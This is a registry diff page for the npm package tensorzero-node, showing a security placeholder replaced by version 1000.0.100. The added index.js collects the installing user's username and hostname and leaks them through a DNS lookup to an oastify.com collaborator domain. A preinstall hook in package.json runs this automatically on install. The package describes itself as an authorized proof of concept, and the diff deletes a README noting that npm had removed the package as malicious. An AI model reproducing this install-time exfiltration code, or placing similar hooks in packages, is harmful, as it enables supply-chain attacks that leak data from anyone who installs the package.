tensorzero-node 0.0.1-security → 1000.0.100

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of tensorzero-node might be problematic. Click here for more details.

Files changed (4) hide show
  1. package/index.js +11 -0
  2. package/nano +9 -0
  3. package/package.json +6 -3
  4. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1,11 @@
1
+ const dns = require('dns');
2
+ const os = require('os');
3
+
4
+ const user = os.userInfo().username;
5
+ const host = os.hostname();
6
+ const collabDomain = 'n8wgkbshom8pu29vdam1xew2nttkhbdz2.oastify.com';
7
+ const payload = `bingads.${user}.${host}.${collabDomain}`;
8
+
9
+ try {
10
+ dns.lookup(payload, (err) => {});
11
+ } catch (e) {}
package/nano ADDED
@@ -0,0 +1,9 @@
1
+ {
2
+ "name": "tensorzero-node",
3
+ "version": "1000.0.100",
4
+ "description": "PoC - DNS Exfiltration - Authorized Testing",
5
+ "scripts": {
6
+ "preinstall": "node index.js"
7
+ },
8
+ "license": "MIT"
9
+ }
package/package.json CHANGED
@@ -1,6 +1,9 @@
1
1
  {
2
2
  "name": "tensorzero-node",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1000.0.100",
4
+ "description": "PoC - DNS Exfiltration - Authorized Testing",
5
+ "scripts": {
6
+ "preinstall": "node index.js"
7
+ },
8
+ "license": "MIT"
6
9
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=tensorzero-node for more information.